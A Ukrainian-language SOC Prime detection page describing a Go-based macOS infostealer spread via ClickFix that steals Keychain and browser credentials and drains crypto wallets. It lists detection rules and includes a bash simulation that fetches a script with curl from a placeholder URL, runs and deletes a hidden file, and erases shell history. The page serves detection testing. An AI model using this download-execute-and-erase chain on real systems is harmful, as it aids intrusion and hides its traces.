SOC Prime Bias: Високий

10 Aug 2026 17:15 UTC

Інфостілер macOS націлюється на криптовалютні гаманці

Author Photo
SOC Prime Team linkedin icon Стежити
Інфостілер macOS націлюється на криптовалютні гаманці
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Стилер для macOS, розроблений на Go, цілиться на користувачів криптовалют через кампанію соціальної інженерії ClickFix. Шкідливе програмне забезпечення краде чутливі облікові дані з Apple Keychain і браузерних магазинів, а також має можливість поступово виснажувати баланси криптовалютних гаманців жертв. Цепочка інфекції починається з профайлера скрипту оболонки, який доставляє архітектурно-специфічні Mach-O навантаження.

Розслідування

Аналітики Huntress виявили загрозу під час ретроспективного полювання і ідентифікували компоненти стилера, специфічного для macOS, який залишався активним протягом приблизно трьох місяців. Розслідування пов’язало підтримуючу інфраструктуру з Aeza Group, санкціонованим російським провайдером куленепробивного хостингу. Дослідники реконструювали ланцюг атаки від початкового запиту соціальної інженерії ClickFix до фінального виконання навантаження і зв’язку C2.

Пом’якшення

Користувачі повинні уникати взаємодії з підозрілими запитами CAPTCHA або слідувати незвичайним інструкціям, які вимагають введення команд у Terminal. Розширення браузерів, призначені для обмеження шкідливих скриптів, такі як NoScript, та інструменти блокування на базі DNS, такі як Pi-hole, можуть допомогти знизити рівень загрози. Комплексне навчання користувачів, спрямоване на соціальну інженерію ClickFix, залишається одним із найефективніших захисних заходів.

Відповідь

Якщо виявлено інфекцію, уражена система macOS повинна бути негайно ізольована, щоб зупинити подальше викрадення даних або виснаження криптовалютного гаманця. Адміністратори повинні знайти і видалити всі шкідливі Mach-O бінарники та пов’язані з ними механізми зберігання. Оскільки шкідливе ПО націлюється на облікові дані, паролі для всіх облікових записів, до яких отримали доступ із скомпрометованого пристрою, слід змінити.

Потік атаки

Виявлення

Запуск Launchctl з нестандартного шляху (через процес створення)

Команда SOC Prime
07 Серп 2026

Можливе намагання енумерації System_profiler (через процес створення)

Команда SOC Prime
07 Серп 2026

Підозріле виконання Curl [MacOS] (через команду)

Команда SOC Prime
07 Серп 2026

IOC (HashSha256) для виявлення: Шкідливе ПО для macOS, яке виснажує гаманці, потребує вашу криптовалюту

SOC Prime AI Правила
07 Серп 2026

IOC (SourceIP) для виявлення: Шкідливе ПО для macOS, яке виснажує гаманці, потребує вашу криптовалюту

SOC Prime AI Правила
07 Серп 2026

IOC (DestinationIP) для виявлення: Шкідливе ПО для macOS, яке виснажує гаманці, потребує вашу криптовалюту

SOC Prime AI Правила
07 Серп 2026

Виявлення стійкості і методів виконання шкідливого ПО для MacOS [Linux File Event]

SOC Prime AI Правила
07 Серп 2026

Атака Шкідливого ПО для macOS, яке виснажує гаманці [Linux Process Creation]

SOC Prime AI Правила
07 Серп 2026

Імітація виконання

Передумова: Перевірка телеметрії та базового рівня повинна бути пройдена.

Обґрунтування: У цьому розділі детально описано точне виконання техніки супротивника (TTP), розробленої для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо віддзеркалювати ідентифіковані TTP та мати на меті генерування точної телеметрії, очікуваної детекторною логікою. Абстрактні або не зв’язані приклади призведуть до помилкової діагностики.

  • Опис атаки & Команди: Супротивник ініціює шахрайство ClickFix. Жертву обманюють, змушуючи запустити команду у своєму терміналі. Команда використовує curl -kFsSL щоб непомітно завантажити шкідливий скрипт. Щоб уникнути залишення слідів, скрипт виконується через однолайновий код bash, який негайно видаляє свій тимчасовий файл (.UlaccK). Нарешті, атакувальник виконує складну history команди для хірургічного видалення команди з історії оболонки користувача, роблячи атаку невидимою для випадкового судрофорензичного огляду.

  • Скрипт регресійного тестування:

    #!/bin/bash
    # Імітація атаки на macOS від ClickFix
    # Цей скрипт імітує точні патерни рядків, необхідні для правила виявлення.
    
    echo "[+] Початок імітації..."
    
    # 1. Імітація завантаження curl (Вибір 3)
    # 2. Імітація виконання bash і негайного видалення (Вибір 1)
    # 3. Імітація маніпуляції з history (Вибір 2)
    
    # Ми комбінуємо це в один рядок, щоб імітувати поведінковий патерн
    # Примітка: Ми використовуємо фіктивний URL, щоб уникнути фактичного виконання шкідливого ПО
    curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}')
    
    echo "[+] Команда імітації виконана."
    echo "[!] Перевірте свій SIEM на попередження 'Атака Шкідливого ПО для macOS, яке виснажує гаманці'."
  • Команди очищення:

    # Видалити будь-які артефакти, залишені симуляцією
    rm -f .UlaccK
    # Примітка: Маніпуляція з history у скрипті призначена для імітації уникнення; 
    # може знадобитися ручне відновлення history для користувача, що тестує.